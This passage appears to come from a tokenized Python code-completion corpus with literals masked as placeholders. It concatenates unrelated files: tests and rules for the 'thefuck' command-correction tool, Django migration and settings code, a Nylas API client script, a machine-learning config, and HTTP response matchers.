( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> pass_ = int ( line . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> if line . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> fail = int ( line . split ( '<STR_LIT:U+0020>' ) [ - <NUM_LIT:1> ] ) <EOL> data [ '<STR_LIT:status>' ] = STATUS_SUCCESS if fail == <NUM_LIT:0> else STATUS_FAILED <EOL> data [ '<STR_LIT>' ] = render_to_string ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> } ) <EOL> data [ '<STR_LIT>' ] = render_to_string ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> '<STR_LIT>' : runs , <EOL> } ) <EOL> data [ '<STR_LIT>' ] = { <EOL> '<STR_LIT>' : tests , <EOL> '<STR_LIT>' : pass_ , <EOL> '<STR_LIT>' : fail , <EOL> } <EOL> data [ '<STR_LIT>' ] = ( pass_ * <NUM_LIT:100> ) / tests if tests else <NUM_LIT:100> <EOL> return data </s>
<s> from io import BytesIO <EOL> import pytest <EOL> from tests . utils import Command <EOL> from thefuck . rules . apt_invalid_operation import match , get_new_command , _get_operations <EOL> invalid_operation = '<STR_LIT>' . format <EOL> apt_help = b'''<STR_LIT>''' <EOL> apt_operations = [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> apt_get_help = b'''<STR_LIT>''' <EOL> apt_get_operations = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT:source>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) ] ) <EOL> def test_match ( script , stderr ) : <EOL> assert match ( Command ( script , stderr = stderr ) ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , "<STR_LIT>" ) ] ) <EOL> def test_not_match ( script , stderr ) : <EOL> assert not match ( Command ( script , stderr = stderr ) ) <EOL> @ pytest . fixture <EOL> def set_help ( mocker ) : <EOL> mock = mocker . patch ( '<STR_LIT>' ) <EOL> def _set_text ( text ) : <EOL> mock . return_value . stdout = BytesIO ( text ) <EOL> return _set_text <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , apt_help , apt_operations ) , <EOL> ( '<STR_LIT>' , apt_get_help , apt_get_operations ) <EOL> ] ) <EOL> def test_get_operations ( set_help , app , help_text , operations ) : <EOL> set_help ( help_text ) <EOL> assert _get_operations ( app ) == operations <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) , <EOL> apt_get_help , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , invalid_operation ( '<STR_LIT>' ) , <EOL> apt_help , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_get_new_command ( set_help , stderr , script , help_text , result ) : <EOL> set_help ( help_text ) <EOL> assert get_new_command ( Command ( script , stderr = stderr ) ) [ <NUM_LIT:0> ] == result </s>
<s> import pytest <EOL> from thefuck . rules . git_pull import match , get_new_command <EOL> from tests . utils import Command <EOL> @ pytest . fixture <EOL> def stderr ( ) : <EOL> return '''<STR_LIT>''' <EOL> def test_match ( stderr ) : <EOL> assert match ( Command ( '<STR_LIT>' , stderr = stderr ) ) <EOL> assert not match ( Command ( '<STR_LIT>' ) ) <EOL> assert not match ( Command ( '<STR_LIT>' , stderr = stderr ) ) <EOL> def test_get_new_command ( stderr ) : <EOL> assert get_new_command ( Command ( '<STR_LIT>' , stderr = stderr ) ) == "<STR_LIT>" </s>
<s> import pytest <EOL> from thefuck . rules . no_such_file import match , get_new_command <EOL> from tests . utils import Command <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_match ( command ) : <EOL> assert match ( command ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , <EOL> ] ) <EOL> def test_not_match ( command ) : <EOL> assert not match ( command ) <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , '<STR_LIT>' ) , <EOL> ( Command ( script = '<STR_LIT>' , stderr = "<STR_LIT>" ) , '<STR_LIT>' ) , <EOL> ] ) <EOL> def test_get_new_command ( command , new_command ) : <EOL> assert get_new_command ( command ) == new_command </s>
<s> import pytest <EOL> from thefuck . shells . tcsh import Tcsh <EOL> @ pytest . mark . usefixtures ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class TestTcsh ( object ) : <EOL> @ pytest . fixture <EOL> def shell ( self ) : <EOL> return Tcsh ( ) <EOL> @ pytest . fixture ( autouse = True ) <EOL> def Popen ( self , mocker ) : <EOL> mock = mocker . patch ( '<STR_LIT>' ) <EOL> mock . return_value . stdout . read . return_value = ( <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' ) <EOL> return mock <EOL> @ pytest . mark . parametrize ( '<STR_LIT>' , [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> def test_from_shell ( self , before , after , shell ) : <EOL> assert shell . from_shell ( before ) == after <EOL> def test_to_shell ( self , shell ) : <EOL> assert shell . to_shell ( '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_and_ ( self , shell ) : <EOL> assert shell . and_ ( '<STR_LIT>' , '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_get_aliases ( self , shell ) : <EOL> assert shell . get_aliases ( ) == { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:l>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> def test_app_alias ( self , shell ) : <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> assert '<STR_LIT>' in shell . app_alias ( '<STR_LIT>' ) <EOL> def test_get_history ( self , history_lines , shell ) : <EOL> history_lines ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert list ( shell . get_history ( ) ) == [ '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> import re <EOL> from thefuck . utils import for_app <EOL> from thefuck . specific . sudo import sudo_support <EOL> from thefuck . shells import shell <EOL> @ sudo_support <EOL> @ for_app ( '<STR_LIT>' ) <EOL> def match ( command ) : <EOL> return ( ( '<STR_LIT>' in command . stderr . lower ( ) <EOL> or '<STR_LIT>' in command . stderr . lower ( ) <EOL> or '<STR_LIT>' in command . stderr . lower ( ) ) ) <EOL> @ sudo_support <EOL> def get_new_command ( command ) : <EOL> repl = shell . and_ ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return re . sub ( r'<STR_LIT>' , repl , command . script ) </s>
<s> from thefuck . utils import replace_argument <EOL> from thefuck . specific . git import git_support <EOL> @ git_support <EOL> def match ( command ) : <EOL> return ( '<STR_LIT>' in command . script and '<STR_LIT>' in command . stderr ) <EOL> def get_new_command ( command ) : <EOL> return replace_argument ( command . script , '<STR_LIT>' , '<STR_LIT>' ) <EOL> enabled_by_default = True </s>
<s> import re <EOL> from thefuck . utils import replace_argument , for_app <EOL> from thefuck . specific . sudo import sudo_support <EOL> @ sudo_support <EOL> @ for_app ( '<STR_LIT>' ) <EOL> def match ( command ) : <EOL> return ( '<STR_LIT>' in command . script and <EOL> '<STR_LIT>' in command . stderr and <EOL> '<STR_LIT>' in command . stderr ) <EOL> def get_new_command ( command ) : <EOL> broken_cmd = re . findall ( r'<STR_LIT>' , <EOL> command . stderr ) [ <NUM_LIT:0> ] <EOL> new_cmd = re . findall ( r'<STR_LIT>' , command . stderr ) [ <NUM_LIT:0> ] <EOL> return replace_argument ( command . script , broken_cmd , new_cmd ) </s>
<s> import subprocess <EOL> from . . utils import memoize , which <EOL> brew_available = bool ( which ( '<STR_LIT>' ) ) <EOL> @ memoize <EOL> def get_brew_path_prefix ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return subprocess . check_output ( [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> universal_newlines = True ) . strip ( ) <EOL> except : <EOL> return None </s>
<s> VERSION = '<STR_LIT:1.0>' </s>
<s> from __future__ import ( absolute_import , division , print_function , <EOL> unicode_literals ) <EOL> import signal <EOL> class JobTimeoutException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BaseDeathPenalty ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , timeout ) : <EOL> self . _timeout = timeout <EOL> def __enter__ ( self ) : <EOL> self . setup_death_penalty ( ) <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> try : <EOL> self . cancel_death_penalty ( ) <EOL> except JobTimeoutException : <EOL> pass <EOL> return False <EOL> def setup_death_penalty ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def cancel_death_penalty ( self ) : <EOL> raise NotImplementedError ( ) <EOL> class UnixSignalDeathPenalty ( BaseDeathPenalty ) : <EOL> def handle_death_penalty ( self , signum , frame ) : <EOL> raise JobTimeoutException ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( self . _timeout ) ) <EOL> def setup_death_penalty ( self ) : <EOL> """<STR_LIT>""" <EOL> signal . signal ( signal . SIGALRM , self . handle_death_penalty ) <EOL> signal . alarm ( self . _timeout ) <EOL> def cancel_death_penalty ( self ) : <EOL> """<STR_LIT>""" <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> signal . signal ( signal . SIGALRM , signal . SIG_DFL ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> migrations . swappable_dependency ( settings . AUTH_USER_MODEL ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . BooleanField ( default = True , help_text = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( help_text = b'<STR_LIT>' , auto_now_add = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( help_text = b'<STR_LIT>' , auto_now = True ) ) , <EOL> ( '<STR_LIT>' , models . FileField ( help_text = b'<STR_LIT>' , upload_to = b'<STR_LIT>' , verbose_name = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( help_text = b'<STR_LIT>' , max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( help_text = b'<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( ) ) , <EOL> ( '<STR_LIT>' , models . TextField ( help_text = b'<STR_LIT>' , null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:64> , null = True ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL , help_text = b'<STR_LIT>' ) ) , <EOL> ( '<STR_LIT>' , models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL , help_text = b'<STR_LIT>' ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> ] </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> USER_TIME_ZONE = '<STR_LIT>' <EOL> USE_TZ = True <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> ADMIN_MEDIA_PREFIX = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> import warnings <EOL> warnings . filterwarnings ( '<STR_LIT:error>' , r"<STR_LIT>" , RuntimeWarning , r'<STR_LIT>' ) <EOL> TEMPLATE_CONTEXT_PROCESSORS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' <EOL> } <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } <EOL> } <EOL> AUTHENTICATION_BACKENDS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> PERMISSIONS = { <EOL> '<STR_LIT:*>' : ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:list>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) <EOL> } <EOL> ANONYMOUS_PERMISSIONS = ( <EOL> '<STR_LIT>' , <EOL> ) <EOL> GROUP_PERMISSIONS = { <EOL> "<STR_LIT>" : ( '<STR_LIT>' , ) , <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> "<STR_LIT>" : ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> } <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = "<STR_LIT>" <EOL> CELERY_RESULT_BACKEND = '<STR_LIT>' <EOL> BROKER_BACKEND = '<STR_LIT>' <EOL> BROKER_HOST = '<STR_LIT:localhost>' <EOL> BROKER_PORT = <NUM_LIT> <EOL> BROKER_VHOST = '<STR_LIT:4>' </s>
<s> import json <EOL> import re <EOL> import pytest <EOL> import time <EOL> import datetime <EOL> import sys <EOL> from nylas import APIClient <EOL> from nylas . client . restful_models import Label , Folder <EOL> from nylas . client . errors import * <EOL> from credentials import APP_ID , APP_SECRET , AUTH_TOKEN <EOL> client = APIClient ( APP_ID , APP_SECRET , AUTH_TOKEN ) <EOL> count = <NUM_LIT:0> <EOL> print "<STR_LIT>" <EOL> for account in client . accounts : <EOL> print ( account . email_address , account . provider ) <EOL> print '<STR_LIT>' <EOL> th = client . threads . where ( { '<STR_LIT>' : '<STR_LIT>' } ) . first ( ) <EOL> print th . subject <EOL> th . mark_as_unread ( ) <EOL> print "<STR_LIT>" <EOL> for thread in client . threads . items ( ) : <EOL> print thread . subject <EOL> count += <NUM_LIT:1> <EOL> if count == <NUM_LIT:10> : <EOL> break <EOL> print "<STR_LIT>" <EOL> draft = client . drafts . create ( ) <EOL> draft . to = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:email>' : '<STR_LIT>' } ] <EOL> draft . subject = "<STR_LIT>" <EOL> draft . body = "<STR_LIT>" <EOL> draft . send ( ) <EOL> print '<STR_LIT>' <EOL> calendar = filter ( lambda cal : not cal . read_only , client . calendars ) [ <NUM_LIT:0> ] <EOL> ev = client . events . create ( ) <EOL> ev . title = "<STR_LIT>" <EOL> d1 = datetime . datetime . now ( ) + datetime . timedelta ( days = <NUM_LIT:5> , hours = <NUM_LIT:4> ) <EOL> d2 = datetime . datetime . now ( ) + datetime . timedelta ( days = <NUM_LIT:5> , hours = <NUM_LIT:5> ) <EOL> ev . when = { "<STR_LIT>" : time . mktime ( d1 . timetuple ( ) ) , "<STR_LIT>" : time . mktime ( d2 . timetuple ( ) ) } <EOL> ev . location = "<STR_LIT>" <EOL> ev . participants = [ { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:email>' : '<STR_LIT>' } ] <EOL> ev . calendar_id = calendar . id <EOL> ev . save ( notify_participants = '<STR_LIT:true>' ) <EOL> print '<STR_LIT>' <EOL> for label in client . labels : <EOL> print label . display_name </s>
<s> n_samples = [ [ <NUM_LIT> , <NUM_LIT:1000> , <NUM_LIT:1000> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] , [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ] <EOL> max_hops = [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:8> ] <EOL> max_hops_pages = <NUM_LIT:10> <EOL> max_sents = <NUM_LIT:5> <EOL> max_links = <NUM_LIT> <EOL> min_words_query = <NUM_LIT:10> <EOL> max_words_query = <NUM_LIT:30> <EOL> n_words = <NUM_LIT> <EOL> n_consec = <NUM_LIT:4> <EOL> root_page = '<STR_LIT>' <EOL> vocab_path = '<STR_LIT>' <EOL> wordemb_path = '<STR_LIT>' <EOL> idf_path = '<STR_LIT>' <EOL> pages_path = '<STR_LIT>' <EOL> pages_emb_path = '<STR_LIT>' <EOL> qp_path_pre = '<STR_LIT>' <EOL> compute_page_pos = False <EOL> dump_path = '<STR_LIT>' <EOL> page_pos_path = '<STR_LIT>' <EOL> cat_pages_path = '<STR_LIT>' <EOL> qp_path = '<STR_LIT>' <EOL> visited_pages_path = None <EOL> dim_proj = <NUM_LIT> <EOL> dim_emb = <NUM_LIT> <EOL> patience = <NUM_LIT:100> <EOL> max_epochs = <NUM_LIT> <EOL> dispFreq = <NUM_LIT:10> <EOL> lrate = <NUM_LIT> <EOL> erate = <NUM_LIT:0.1> <EOL> saveto = '<STR_LIT>' <EOL> validFreq = <NUM_LIT> <EOL> saveFreq = <NUM_LIT> <EOL> batch_size_train = <NUM_LIT:16> <EOL> batch_size_pred = <NUM_LIT:4> <EOL> max_hops_train = <NUM_LIT:2> <EOL> max_hops_pred = <NUM_LIT:4> <EOL> learning = '<STR_LIT>' <EOL> act_sel = '<STR_LIT>' <EOL> encoder = '<STR_LIT>' <EOL> n_layers = <NUM_LIT:1> <EOL> reload_model = False <EOL> idb = False <EOL> train_size = <NUM_LIT:1000> <EOL> valid_size = <NUM_LIT:1000> <EOL> test_size = <NUM_LIT:1000> <EOL> outpath = "<STR_LIT>" <EOL> fixed_wemb = True <EOL> k = <NUM_LIT:4> <EOL> att_query = False <EOL> att_doc = False <EOL> att_segment_type = '<STR_LIT>' <EOL> max_segs_doc = <NUM_LIT:10> <EOL> att_window = <NUM_LIT:3> <EOL> mixer = <NUM_LIT:0> <EOL> replay_mem_size = <NUM_LIT> <EOL> replay_start = <NUM_LIT> <EOL> freeze_mem = <NUM_LIT> <EOL> selective_mem = - <NUM_LIT:1> <EOL> update_freq = <NUM_LIT:100> <EOL> epsilon_start = <NUM_LIT:1.0> <EOL> epsilon_min = <NUM_LIT> <EOL> epsilon_decay = <NUM_LIT:1> <EOL> discount = <NUM_LIT> <EOL> clip = <NUM_LIT:1.0> <EOL> load_emb_mem = True </s>
<s> class Bot ( ) : <EOL> @ staticmethod <EOL> def from_json ( json ) : <EOL> if json : <EOL> return Bot ( name = json . get ( "<STR_LIT:name>" , "<STR_LIT>" ) , <EOL> id = json [ "<STR_LIT>" ] , <EOL> integration_counter = json . get ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> return EmptyBot ( ) <EOL> def __init__ ( self , ** args ) : <EOL> self . name = args [ "<STR_LIT:name>" ] <EOL> self . id = args [ "<STR_LIT:id>" ] <EOL> self . integration_counter = args [ "<STR_LIT>" ] <EOL> def __repr__ ( self ) : <EOL> return self . __dict__ . __str__ ( ) <EOL> class EmptyBot ( ) : <EOL> def __init__ ( self , ** args ) : <EOL> self . name = "<STR_LIT>" <EOL> self . id = "<STR_LIT>" <EOL> self . integration_counter = "<STR_LIT>" </s>
<s> import json <EOL> from should_dsl import matcher <EOL> from werkzeug . http import HTTP_STATUS_CODES <EOL> @ matcher <EOL> class GenericStatusChecker ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , expected ) : <EOL> self . _expected = expected <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . status_code <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( self . _expected ) <EOL> def make_status_checker ( nameprefix , status ) : <EOL> '''<STR_LIT>''' <EOL> class Checker ( object ) : <EOL> name = '<STR_LIT>' . format ( nameprefix , status ) <EOL> def __call__ ( self ) : <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual = response . status_code <EOL> self . _response_data = response . data <EOL> return self . _actual == status <EOL> def message_for_failed_should ( self ) : <EOL> message = '<STR_LIT>' . format ( <EOL> status , self . _actual <EOL> ) <EOL> if self . _response_data : <EOL> response = '<STR_LIT>' . format ( self . _response_data ) <EOL> message = '<STR_LIT:\n>' . join ( [ message , response ] ) <EOL> return message <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( status ) <EOL> return Checker <EOL> _status_codes = HTTP_STATUS_CODES . keys ( ) <EOL> for code in _status_codes : <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> matcher ( make_status_checker ( '<STR_LIT>' , code ) ) <EOL> @ matcher <EOL> class RedirectMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , location ) : <EOL> self . _expected = '<STR_LIT>' + location <EOL> self . _status_ok = True <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _actual_status = response . status_code <EOL> self . _actual_location = response . location <EOL> if self . _actual_status not in ( <NUM_LIT> , <NUM_LIT> ) : <EOL> self . _status_ok = False <EOL> return False <EOL> return self . _actual_location == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> if self . _status_ok : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected , self . _actual_location <EOL> ) <EOL> else : <EOL> return '<STR_LIT>' . format ( <EOL> self . _actual_status <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . _expected <EOL> ) <EOL> @ matcher <EOL> class JsonMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , * pargs , ** kwargs ) : <EOL> if len ( pargs ) > <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> if len ( kwargs ) > <NUM_LIT:0> : <EOL> if len ( pargs ) != <NUM_LIT:0> : <EOL> raise Exception ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> self . _expected = dict ( ** kwargs ) <EOL> else : <EOL> self . _expected = pargs [ <NUM_LIT:0> ] <EOL> return self <EOL> def match ( self , response ) : <EOL> try : <EOL> self . _actual = response . json <EOL> except AttributeError : <EOL> self . _actual = json . loads ( response . data ) <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected <EOL> ) <EOL> @ matcher <EOL> class ContentTypeMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , content_type ) : <EOL> self . _mimetype = content_type . find ( '<STR_LIT:;>' ) == - <NUM_LIT:1> <EOL> self . _match_either = content_type . find ( '<STR_LIT:/>' ) == - <NUM_LIT:1> <EOL> self . _wildcard = any ( <EOL> True for sec in content_type . split ( '<STR_LIT:/>' ) if sec == '<STR_LIT:*>' <EOL> ) <EOL> self . _expected = content_type <EOL> return self <EOL> def match ( self , response ) : <EOL> if self . _expected == '<STR_LIT:*>' : <EOL> return True <EOL> if self . _mimetype : <EOL> self . _actual = response . mimetype <EOL> sections = self . _actual . split ( '<STR_LIT:/>' ) <EOL> if self . _match_either : <EOL> return any ( True for sec in sections if sec == self . _expected ) <EOL> if self . _wildcard : <EOL> expectedsections = self . _expected . split ( '<STR_LIT:/>' ) <EOL> for actual , expected in zip ( sections , expectedsections ) : <EOL> if actual != expected and expected != '<STR_LIT:*>' : <EOL> return False <EOL> return True <EOL> else : <EOL> self . _actual = response . content_type <EOL> return self . _actual == self . _expected <EOL> def message_for_failed_should ( self ) : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected , self . _actual <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> return "<STR_LIT>" . format ( self . _expected ) <EOL> @ matcher <EOL> class HeaderMatcher ( object ) : <EOL> '''<STR_LIT>''' <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self , * pargs ) : <EOL> if len ( pargs ) == <NUM_LIT:1> : <EOL> expected = pargs [ <NUM_LIT:0> ] . split ( '<STR_LIT::>' ) <EOL> elif len ( pargs ) == <NUM_LIT:2> : <EOL> expected = pargs <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> self . _expected_name = expected [ <NUM_LIT:0> ] <EOL> try : <EOL> self . _expected_value = expected [ <NUM_LIT:1> ] . strip ( ) <EOL> self . _check_value = True <EOL> except IndexError : <EOL> self . _check_value = False <EOL> return self <EOL> def match ( self , response ) : <EOL> self . _value_found = None <EOL> for name , value in response . header_list : <EOL> if name == self . _expected_name : <EOL> self . _value_found = value <EOL> if not self . _check_value : <EOL> return True <EOL> elif value == self . _expected_value : <EOL> return True <EOL> return False <EOL> def message_for_failed_should ( self ) : <EOL> if self . _value_found : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name , self . _expected_value , self . _value_found <EOL> ) <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name <EOL> ) <EOL> def message_for_failed_should_not ( self ) : <EOL> if self . _check_value : <EOL> return "<STR_LIT>" . format ( <EOL> self . _expected_name , self . _expected_value <EOL> ) <EOL> return "<STR_LIT>" 